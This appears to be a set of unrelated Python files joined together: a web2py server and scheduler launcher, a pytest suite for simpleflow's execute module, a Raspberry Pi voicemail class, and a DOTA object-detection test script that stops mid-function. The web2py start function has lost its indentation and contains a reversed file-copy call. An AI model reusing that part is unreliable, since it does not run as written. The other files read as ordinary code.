    return os.path.isdir(os.path.join(options.folder, 'applications', appname))
def get_code_for_scheduler(app, options):
    """Build the python snippet that runs the scheduler for one app.

    *app* is a list: [appname] or [appname, group1, group2, ...].
    Returns (appname, code) on success, or (None, None) when the app
    does not exist under options.folder.
    """
    if len(app) == 1 or app[1] is None:
        code = "from gluon import current;current._scheduler.loop()"
    else:
        # restrict the scheduler to the requested group names
        code = "from gluon import current;current._scheduler.group_names = ['%s'];"
        code += "current._scheduler.loop()"
        code = code % ("','".join(app[1:]))
    app_ = app[0]
    if not check_existent_app(options, app_):
        print "Application '%s' doesn't exist, skipping" % app_
        return None, None
    return app_, code
def start_schedulers(options):
    """Start a scheduler for every app given with -K and wait on them.

    With a single app and no -X, the scheduler runs inline in this
    process (blocking). Otherwise one multiprocessing.Process is
    spawned per app and this function joins them until interrupted.
    """
    try:
        from multiprocessing import Process
    except:
        sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
        return
    processes = []
    apps = [(app.strip(), None) for app in options.scheduler.split(',')]
    if options.scheduler_groups:
        # -K app:group syntax was used: honor the parsed groups
        apps = options.scheduler_groups
    code = "from gluon import current;current._scheduler.loop()"
    logging.getLogger().setLevel(options.debuglevel)
    if len(apps) == 1 and not options.with_scheduler:
        # single scheduler: run it inline, blocking this process
        app_, code = get_code_for_scheduler(apps[0], options)
        if not app_:
            return
        print 'starting single-scheduler for "%s"...' % app_
        run(app_, True, True, None, False, code)
        return
    for app in apps:
        app_, code = get_code_for_scheduler(app, options)
        if not app_:
            continue
        print 'starting scheduler for "%s"...' % app_
        args = (app_, True, True, None, False, code)
        p = Process(target=run, args=args)
        processes.append(p)
        print "Currently running %s scheduler processes" % (len(processes))
        p.start()
        ##to avoid bashing the db at the same time
        time.sleep(0.7)
    print "Processes started"
    # block until the children exit; on Ctrl-C just report, on any
    # other error force-terminate the child
    for p in processes:
        try:
            p.join()
        except (KeyboardInterrupt, SystemExit):
            print "Processes stopped"
        except:
            p.terminate()
            p.join()
def start(cron=True):
""" Start server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
logfile0 = os.path.join('extras','examples','logging.example.conf')
if not os.path.exists('logging.conf') and os.path.exists(logfile0):
import shutil
sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
shutil.copyfile('logging.example.conf', logfile0)
sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui and options.password=='<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
# ##-X (if no tk, the widget takes care of it himself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
print 'please visit:'
print '\t', url
print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
test_execute.py | # coding: utf-8
from __future__ import print_function
import json
import os.path
import platform
import subprocess
import sys
import tempfile
import threading
import time
import psutil
import pytest
from simpleflow import execute
from simpleflow.exceptions import ExecutionError, ExecutionTimeoutError
@execute.program(path="ls")
def ls_nokwargs(*args):
    """Wrap ``ls``, accepting positional arguments only."""
    pass


def test_execute_program_no_kwargs():
    with tempfile.NamedTemporaryFile() as f:
        with pytest.raises(TypeError) as excinfo:
            ls_nokwargs(hide=f.name)
        expected = "command does not take keyword arguments"
        assert excinfo.value.args[0] == expected
@execute.program(path="ls")
def ls_noargs(**kwargs):
    """Wrap ``ls``, accepting keyword arguments only."""
    pass


def test_execute_program_no_args():
    with tempfile.NamedTemporaryFile() as f:
        with pytest.raises(TypeError) as excinfo:
            ls_noargs(f.name)
        expected = "command does not take varargs"
        assert excinfo.value.args[0] == expected
@execute.program(path="ls")
def ls_restrict_named_arguments(hide=execute.RequiredArgument, *args):
    """Wrap ``ls``; the --hide argument is mandatory."""
    pass


def test_execute_program_restrict_named_arguments():
    with tempfile.NamedTemporaryFile() as f:
        with pytest.raises(TypeError) as excinfo:
            ls_restrict_named_arguments(f.name)
        assert excinfo.value.args[0] == 'argument "hide" not found'
@execute.program(path="ls")
def ls_optional_named_arguments(hide="", *args):
    """Wrap ``ls`` with an optional --hide argument."""
    pass


@pytest.mark.xfail(
    platform.system() == "Darwin", reason="ls doesn't have a --hide option on MacOSX"
)
def test_execute_program_optional_named_arguments():
    with tempfile.NamedTemporaryFile(suffix="\xe9") as f:
        listed = ls_optional_named_arguments(f.name).strip()
        assert listed == f.name
        assert f.name not in ls_optional_named_arguments(hide=f.name)
@execute.program()
def ls(*args, **kwargs):
    """Wrap the ``ls`` command with free-form arguments."""
    pass


def test_execute_program_with_positional_arguments():
    with tempfile.NamedTemporaryFile() as f:
        listed = ls(f.name).strip()
        assert listed == f.name
@pytest.mark.xfail(
    platform.system() == "Darwin", reason="ls doesn't have a --hide option on MacOSX"
)
def test_execute_program_with_named_arguments():
    with tempfile.NamedTemporaryFile() as f:
        directory = os.path.dirname(f.name)
        listing = ls(directory, hide=f.name).strip()
        assert f.name not in listing
@execute.program()
def ls_2args(a, b):
    """Wrap ``ls`` restricted to exactly two arguments."""
    pass


def test_ls_2args():
    with pytest.raises(TypeError) as excinfo:
        ls_2args(1, 2, 3)
    assert excinfo.value.args[0] == "command takes 2 arguments: 3 passed"
@execute.python()
def inc(xs):
    """Return a new list with every element of *xs* incremented by one."""
    return list(map(lambda x: x + 1, xs))


def test_function_as_program():
    assert inc([1, 2, 3]) == [2, 3, 4]
@execute.python()
def add(a, b=1):
    """Return the sum of *a* and *b* (default increment of 1)."""
    return a + b


@execute.python()
class Add(object):
    """Task-class flavour of :func:`add`."""

    def __init__(self, a, b=1):
        self.a = a
        self.b = b

    def execute(self):
        return self.a + self.b


def test_function_as_program_with_default_kwarg():
    assert add(4) == 5
    assert Add(4) == 5


def test_function_as_program_with_kwargs():
    assert add(3, 7) == 10
    assert Add(3, 7) == 10
def test_function_as_program_raises_builtin_exception():
    # Both the function and the class flavour must serialize TypeError.
    for task in (add, Add):
        with pytest.raises(ExecutionError) as excinfo:
            task("1")
        assert '"error":"TypeError"' in str(excinfo.value)
@execute.python()
def print_string(s, retval):
    """Print *s* without a newline and return *retval*."""
    print(s, end="")
    return retval


@execute.python()
class PrintString(object):
    """Task-class flavour: print the string, return *retval*."""

    def __init__(self, s, retval):
        self.s = s
        self.retval = retval

    def execute(self):
        print(self.s)
        return self.retval


def test_function_with_print():
    # stdout noise must not leak into the (None) return value
    for task in (print_string, PrintString):
        actual = task("This isn't part of the return value", None)
        assert actual is None, actual


def test_function_with_print_and_return():
    for task in (print_string, PrintString):
        assert task("This isn't part of the return value", 42) == 42


def test_function_returning_lf():
    # embedded newlines in the result must survive the round-trip
    for task in (print_string, PrintString):
        assert task("This isn't part of the return value", "a\nb") == "a\nb"
class DummyException(Exception):
    """Custom exception used to exercise error propagation."""
    pass


@execute.python()
def raise_dummy_exception():
    """Always raise :class:`DummyException`."""
    raise DummyException


@execute.python()
class RaiseDummyException(object):
    """Task-class flavour of :func:`raise_dummy_exception`."""

    def __init__(self):
        pass

    @staticmethod
    def execute():
        raise DummyException


def test_function_as_program_raises_custom_exception():
    for task in (raise_dummy_exception, RaiseDummyException):
        with pytest.raises(ExecutionError) as excinfo:
            task()
        assert '"error":"DummyException"' in str(excinfo.value)
@execute.python()
def raise_timeout_error():
    """Raise simpleflow's own TimeoutError (imported lazily in the task)."""
    from simpleflow.exceptions import TimeoutError

    raise TimeoutError("timeout", 1)


def test_function_as_program_raises_module_exception():
    with pytest.raises(ExecutionError) as excinfo:
        raise_timeout_error()
    assert '"error":"TimeoutError"' in str(excinfo.value)
@execute.python()
def warn():
    """Emit a RuntimeWarning on stderr, then fail."""
    import warnings

    warnings.warn(
        "The _posixsubprocess module is not being used. "
        "Child process reliability may suffer if your "
        "program uses threads.",
        RuntimeWarning,
    )
    raise Exception("Fake Exception")


def test_function_with_warning():
    # The warning text on stderr must not break error deserialization:
    # the raised exception must still reach the caller.
    raised = False
    try:
        warn()
    except Exception:
        raised = True
    assert raised
def test_function_returning_unicode():
    # non-ASCII return values must survive the round-trip unchanged
    assert print_string("", "ʘ‿ʘ") == u"ʘ‿ʘ"


@execute.python()
def raise_dummy_exception_with_unicode():
    """Raise DummyException carrying a non-ASCII message."""
    raise DummyException("ʘ‿ʘ")


def test_exception_with_unicode():
    with pytest.raises(ExecutionError) as excinfo:
        raise_dummy_exception_with_unicode()
    assert '"error":"DummyException"' in str(excinfo.value)
    payload = json.loads(excinfo.value.args[0])
    assert payload["message"] == u"ʘ‿ʘ"
def sleep_and_return(seconds):
    """Block for *seconds* seconds, then echo the argument back."""
    time.sleep(seconds)
    return seconds
def test_timeout_execute():
    # TODO: the timeout should be smaller, but as a workaround for
    # PyPy slowness/overhead we keep it at 3 seconds
    timeout = 3
    func = execute.python(timeout=timeout)(sleep_and_return)
    # Normal case: finishes well before the timeout
    assert func(0.25) == 0.25
    # Timeout case: must abort long before the requested 10s sleep
    started = time.time()
    with pytest.raises(ExecutionTimeoutError) as e:
        func(10)
    assert (time.time() - started) < 10.0
    assert "ExecutionTimeoutError after {} seconds".format(timeout) in str(e.value)


def test_timeout_execute_from_thread():
    # Same scenario, driven from a worker thread
    worker = threading.Thread(target=test_timeout_execute)
    worker.start()
    worker.join()
def create_sleeper_subprocess():
    """Spawn a detached ``sleep 600`` child and return its pid."""
    pid = subprocess.Popen(["sleep", "600"]).pid
    return pid


@pytest.mark.xfail(
    platform.system() == "Darwin" or "PyPy" in sys.version,
    reason="psutil process statuses are buggy on OSX, and test randomly fails on PyPy",
)
def test_execute_dont_kill_children():
    pid = execute.python()(create_sleeper_subprocess)()
    # FIX: local was previously named `subprocess`, shadowing the imported
    # `subprocess` module within this function.
    sleeper = psutil.Process(pid)
    assert sleeper.status() == "sleeping"
    sleeper.terminate()  # cleanup


def test_execute_kill_children():
    pid = execute.python(kill_children=True)(create_sleeper_subprocess)()
    with pytest.raises(psutil.NoSuchProcess):
        psutil.Process(pid)
@execute.python()
def length(x):
    """Return ``len(x)``."""
    return len(x)


def test_large_command_line():
    payload = "a" * 1024 * 1024
    assert length(payload) == len(payload)


def test_large_command_line_unicode():
    payload = u"ä" * 1024 * 1024
    assert length(payload) == len(payload)


def test_large_command_line_utf8():
    """
    UTF-8 bytes must be handled as Unicode, both in Python 2 and Python 3.
    """
    payload = u"ä" * 1024 * 1024
    assert length(payload.encode("utf-8")) == len(payload)
|
voicemail.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# voicemail.py
#
# Copyright 2018 <pi@rhombus1>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from datetime import datetime
from messaging.message import Message
from hardware.indicators import MessageIndicator, MessageCountIndicator, \
GPIO_MESSAGE, GPIO_MESSAGE_COUNT_PINS, GPIO_MESSAGE_COUNT_KWARGS
class VoiceMail:
    """Voice-mail subsystem: records caller messages and drives the
    message-waiting indicator hardware.

    Wraps the Message DB interface and the GPIO LED indicators, and runs a
    background thread that refreshes the indicators whenever the shared
    message event fires.
    """

    def __init__(self, db, config, modem):
        """
        Initialize the database tables for voice messages.

        :param db: open database connection, passed through to Message.
        :param config: application config mapping; mutated here to expose
            MESSAGE_EVENT so other components can signal message changes.
        :param modem: modem interface used to play audio and record messages.
        """
        if config["DEBUG"]:
            print("Initializing VoiceMail")
        self.db = db
        self.config = config
        self.modem = modem
        # Create a message event shared with the Message class used to monitor changes
        self.message_event = threading.Event()
        self.config["MESSAGE_EVENT"] = self.message_event
        # Initialize the message indicators (LEDs); config entries override
        # the hardware module's default pin assignments.
        self.message_indicator = MessageIndicator(
            self.config.get("GPIO_LED_MESSAGE_PIN", GPIO_MESSAGE),
            self.config.get("GPIO_LED_MESSAGE_BRIGHTNESS", 100),
            self.config.get("GPIO_DISABLED", False)
        )
        pins = self.config.get("GPIO_LED_MESSAGE_COUNT_PINS", GPIO_MESSAGE_COUNT_PINS)
        kwargs = self.config.get("GPIO_LED_MESSAGE_COUNT_KWARGS", GPIO_MESSAGE_COUNT_KWARGS)
        self.message_count_indicator = MessageCountIndicator(self.config.get("GPIO_DISABLED", False), *pins, **kwargs)
        # Create the Message object used to interface with the DB
        self.messages = Message(db, config)
        # Start the thread that monitors the message events and updates the indicators
        self._stop_event = threading.Event()
        self._thread = threading.Thread(target=self._event_handler)
        self._thread.name = "voice_mail_event_handler"
        self._thread.start()
        # Pulse the indicator if an unplayed msg is waiting
        self.reset_message_indicator()
        if self.config["DEBUG"]:
            print("VoiceMail initialized")

    def stop(self):
        """
        Stops the voice mail thread and releases hardware resources.
        """
        self._stop_event.set()
        # Worker wakes at most 2s later (its wait timeout), so join is bounded.
        self._thread.join()
        self.message_indicator.close()
        self.message_count_indicator.close()

    def _event_handler(self):
        """
        Thread function that updates the message indicators upon a message event.
        """
        while not self._stop_event.is_set():
            # Get the number of unread messages
            # Wake every 2s so _stop_event is polled even with no events.
            # NOTE(review): message_event is never cleared here; presumably the
            # Message class clears it after signaling -- confirm, otherwise this
            # loop re-runs reset_message_indicator every 2s once it is set.
            if self.message_event.wait(2.0):
                if self.config["DEBUG"]:
                    print("Message Event triggered")
                self.reset_message_indicator()

    def voice_messaging_menu(self, call_no, caller):
        """
        Play a voice message menu and respond to the choices.

        :param call_no: identifier of the current call (used for recordings).
        :param caller: caller-ID record with at least NMBR and NAME keys.
        """
        # Build some common paths
        voice_mail = self.config.get_namespace("VOICE_MAIL_")
        voice_mail_menu_file = voice_mail['menu_file']
        invalid_response_file = voice_mail['invalid_response_file']
        goodbye_file = voice_mail['goodbye_file']
        # Indicate the user is in the menu
        self.message_indicator.blink()
        tries = 0
        wait_secs = 8  # Candidate for configuration
        rec_msg = False
        # Up to 3 invalid responses are tolerated; a keypress timeout ends
        # the menu immediately.
        while tries < 3:
            self.modem.play_audio(voice_mail_menu_file)
            success, digit = self.modem.wait_for_keypress(wait_secs)
            if not success:
                break
            if digit == '1':
                self.record_message(call_no, caller)
                rec_msg = True  # prevent a duplicate reset_message_indicator
                break
            elif digit == '0':
                # End this call
                break
            else:
                # Try again--up to a limit
                self.modem.play_audio(invalid_response_file)
                tries += 1
        self.modem.play_audio(goodbye_file)
        # record_message already resets the indicator via messages.add.
        if not rec_msg:
            self.reset_message_indicator()

    def record_message(self, call_no, caller, detect_silence=True):
        """
        Records a message.

        :param call_no: identifier of the current call, embedded in the filename.
        :param caller: caller-ID record; NMBR and NAME become filename fields.
        :param detect_silence: passed to the modem to stop recording on silence.
        :return: the new message ID on success, or None if recording failed.
        """
        # Build the filename used for a potential message.
        # Underscores in NAME are replaced so the '_'-separated filename
        # fields remain unambiguous.
        path = self.config["VOICE_MAIL_MESSAGE_FOLDER"]
        filepath = os.path.join(path, "{}_{}_{}_{}.wav".format(
            call_no,
            caller["NMBR"],
            caller["NAME"].replace('_', '-'),
            datetime.now().strftime("%m%d%y_%H%M")))
        # Play instructions to caller
        leave_msg_file = self.config["VOICE_MAIL_LEAVE_MESSAGE_FILE"]
        self.modem.play_audio(leave_msg_file)
        # Show recording in progress
        self.message_indicator.turn_on()
        if self.modem.record_audio(filepath, detect_silence):
            # Save to Message table (message.add will update the indicator)
            msg_no = self.messages.add(call_no, filepath)
            # Return the messageID on success
            return msg_no
        else:
            self.reset_message_indicator()
            # Return failure
            return None

    def delete_message(self, msg_no):
        """
        Removes the message record and associated wav file.

        :param msg_no: ID of the message to delete.
        :return: result of Message.delete (its success indication).
        """
        # Remove message and file (message.delete will update the indicator)
        return self.messages.delete(msg_no)

    def reset_message_indicator(self):
        """Refresh the LED and count display from the unplayed-message count.

        Counts 1-9 are shown directly; 10+ is shown as '9' with the decimal
        point lit (single-digit display overflow marker); zero blanks the
        display and turns the LED off.
        """
        unplayed_count = self.messages.get_unplayed_count()
        if self.config["DEBUG"]:
            print("Resetting Message Indicator to show {} unplayed messages".format(unplayed_count))
        if unplayed_count > 0:
            self.message_indicator.pulse()
            if unplayed_count < 10:
                self.message_count_indicator.display(unplayed_count)
                self.message_count_indicator.decimal_point = False
            else:
                self.message_count_indicator.display(9)
                self.message_count_indicator.decimal_point = True
        else:
            self.message_indicator.turn_off()
            self.message_count_indicator.display(' ')
            self.message_count_indicator.decimal_point = False
|
test_dota.py | # -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.cython_utils.cython_nms import nms, soft_nms
def worker(gpu_id, images, det_net, args, result_queue):
    """Run detection for a list of images on one GPU and push results to a queue.

    Builds the TF inference graph once, restores the checkpoint, then slides an
    (h_len x w_len) crop window (with h_overlap/w_overlap) over each image,
    runs detection per crop, maps boxes back to full-image coordinates,
    applies per-class (soft-)NMS, and puts one result dict per image on
    `result_queue`.

    :param gpu_id: int GPU index, exported via CUDA_VISIBLE_DEVICES.
    :param images: list of image file paths to process.
    :param det_net: DetectionNetwork used to build the detection graph.
    :param args: parsed CLI namespace (h_len, w_len, h_overlap, w_overlap, ...).
    :param result_queue: multiprocessing.Queue receiving dicts with keys
        'boxes', 'scores', 'labels', 'image_id'.
    """
    os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
    img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3])  # is RGB. not BGR
    img_batch = tf.cast(img_plac, tf.float32)
    img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
                                                     target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN[0],
                                                     length_limitation=cfgs.IMG_MAX_LENGTH)
    # The *_v1d backbones expect mean/std normalization; others mean-subtraction only.
    if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
        img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
    else:
        img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
    img_batch = tf.expand_dims(img_batch, axis=0)
    detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
        input_img_batch=img_batch,
        gtboxes_batch=None,
        gtboxes_r_batch=None)
    init_op = tf.group(
        tf.global_variables_initializer(),
        tf.local_variables_initializer()
    )
    restorer, restore_ckpt = det_net.get_restorer()
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    # Per-class NMS thresholds; loop-invariant, so build once (was rebuilt per image).
    threshold = {'roundabout': 0.35, 'tennis-court': 0.35, 'swimming-pool': 0.4, 'storage-tank': 0.3,
                 'soccer-ball-field': 0.3, 'small-vehicle': 0.4, 'ship': 0.35, 'plane': 0.35,
                 'large-vehicle': 0.4, 'helicopter': 0.4, 'harbor': 0.3, 'ground-track-field': 0.4,
                 'bridge': 0.3, 'basketball-court': 0.4, 'baseball-diamond': 0.3}
    with tf.Session(config=config) as sess:
        sess.run(init_op)
        # Idiomatic identity test (was: `if not restorer is None`).
        if restorer is not None:
            restorer.restore(sess, restore_ckpt)
            print('restore model %d ...' % gpu_id)
        for img_path in images:
            img = cv2.imread(img_path)
            box_res = []
            label_res = []
            score_res = []
            imgH = img.shape[0]
            imgW = img.shape[1]
            # Pad images smaller than one window up to the window size.
            if imgH < args.h_len:
                temp = np.zeros([args.h_len, imgW, 3], np.float32)
                temp[0:imgH, :, :] = img
                img = temp
                imgH = args.h_len
            if imgW < args.w_len:
                temp = np.zeros([imgH, args.w_len, 3], np.float32)
                temp[:, 0:imgW, :] = img
                img = temp
                imgW = args.w_len
            # Slide the crop window; the last window is clamped to the image edge.
            for hh in range(0, imgH, args.h_len - args.h_overlap):
                if imgH - hh - 1 < args.h_len:
                    hh_ = imgH - args.h_len
                else:
                    hh_ = hh
                for ww in range(0, imgW, args.w_len - args.w_overlap):
                    if imgW - ww - 1 < args.w_len:
                        ww_ = imgW - args.w_len
                    else:
                        ww_ = ww
                    src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
                    # cv2 loads BGR; the graph expects RGB, hence the channel flip.
                    resized_img, det_boxes_h_, det_scores_h_, det_category_h_ = \
                        sess.run(
                            [img_batch, detection_boxes, detection_scores, detection_category],
                            feed_dict={img_plac: src_img[:, :, ::-1]}
                        )
                    resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
                    src_h, src_w = src_img.shape[0], src_img.shape[1]
                    if len(det_boxes_h_) > 0:
                        # Undo the inference resize, then shift into full-image coords.
                        det_boxes_h_[:, 0::2] *= (src_w / resized_w)
                        det_boxes_h_[:, 1::2] *= (src_h / resized_h)
                        for ii in range(len(det_boxes_h_)):
                            box = det_boxes_h_[ii]
                            box[0] = box[0] + ww_
                            box[1] = box[1] + hh_
                            box[2] = box[2] + ww_
                            box[3] = box[3] + hh_
                            box_res.append(box)
                            label_res.append(det_category_h_[ii])
                            score_res.append(det_scores_h_[ii])
            box_res = np.array(box_res)
            label_res = np.array(label_res)
            score_res = np.array(score_res)
            # Drop very low-confidence detections before NMS.
            filter_indices = score_res >= 0.05
            score_res = score_res[filter_indices]
            box_res = box_res[filter_indices]
            label_res = label_res[filter_indices]
            box_res_ = []
            label_res_ = []
            score_res_ = []
            # Per-class NMS over the merged crop detections.
            for sub_class in range(1, cfgs.CLASS_NUM + 1):
                index = np.where(label_res == sub_class)[0]
                if len(index) == 0:
                    continue
                tmp_boxes_h = box_res[index]
                tmp_label_h = label_res[index]
                tmp_score_h = score_res[index]
                tmp_boxes_h = np.array(tmp_boxes_h)
                # NMS input layout: [x1, y1, x2, y2, score].
                tmp = np.zeros([tmp_boxes_h.shape[0], tmp_boxes_h.shape[1] + 1])
                tmp[:, 0:-1] = tmp_boxes_h
                tmp[:, -1] = np.array(tmp_score_h)
                if cfgs.SOFT_NMS:
                    inx = soft_nms(np.array(tmp, np.float32), 0.5, Nt=threshold[LABEL_NAME_MAP[sub_class]],
                                   threshold=0.001, method=2)  # 2 means Gaussian
                else:
                    inx = nms(np.array(tmp, np.float32),
                              threshold[LABEL_NAME_MAP[sub_class]])
                box_res_.extend(np.array(tmp_boxes_h)[inx])
                score_res_.extend(np.array(tmp_score_h)[inx])
                label_res_.extend(np.array(tmp_label_h)[inx])
            result_dict = {'boxes': np.array(box_res_), 'scores': np.array(score_res_),
                           'labels': np.array(label_res_), 'image_id': img_path}
            result_queue.put_nowait(result_dict)
def _draw_detections(res, save_path):
    """Render one image's above-threshold boxes and save the visualization."""
    nake_name = res['image_id'].split('/')[-1]
    tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
    draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
    draw_img = np.array(cv2.imread(res['image_id']), np.float32)
    detected_indices = res['scores'] >= cfgs.SHOW_SCORE_THRSHOLD
    detected_scores = res['scores'][detected_indices]
    detected_boxes = res['boxes'][detected_indices]
    detected_categories = res['labels'][detected_indices]
    final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
                                                                        boxes=detected_boxes,
                                                                        labels=detected_categories,
                                                                        scores=detected_scores,
                                                                        method=0,
                                                                        in_graph=False)
    cv2.imwrite(draw_path, final_detections)


def _write_detections(res, save_path, txt_name):
    """Append one image's detections to the per-class Task1 files and mark it done."""
    tools.mkdir(os.path.join(save_path, 'dota_res'))
    write_handle = {}
    for sub_class in NAME_LABEL_MAP.keys():
        if sub_class == 'back_ground':
            continue
        write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
    try:
        # box_idx (was `i`) no longer shadows the caller's loop variable.
        for box_idx, hbox in enumerate(res['boxes']):
            command = '%s %.3f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
                                                         res['scores'][box_idx],
                                                         hbox[0], hbox[1], hbox[2], hbox[3])
            write_handle[LABEL_NAME_MAP[res['labels'][box_idx]]].write(command)
    finally:
        # Always release the per-class handles, even if a write fails.
        for handle in write_handle.values():
            handle.close()
    # Record the image as tested so an interrupted run can resume.
    with open(txt_name, 'a+') as fw:
        fw.write('{}\n'.format(res['image_id'].split('/')[-1]))


def test_dota(det_net, real_test_img_list, args, txt_name):
    """Fan images out to one worker process per GPU and collect the results.

    Splits `real_test_img_list` evenly over the GPUs in args.gpus, starts one
    `worker` process per GPU, then drains `result_queue`: each result is either
    visualized (--show_box) or appended to the DOTA Task1 submission files.

    :param det_net: DetectionNetwork passed to each worker.
    :param real_test_img_list: list of image paths to evaluate.
    :param args: parsed CLI namespace.
    :param txt_name: path of the resume/progress file (ignored in show_box mode).
    """
    save_path = os.path.join('./test_dota', cfgs.VERSION)
    nr_records = len(real_test_img_list)
    pbar = tqdm(total=nr_records)
    gpu_num = len(args.gpus.strip().split(','))
    nr_image = math.ceil(nr_records / gpu_num)
    result_queue = Queue(500)
    procs = []
    for i, gpu_id in enumerate(args.gpus.strip().split(',')):
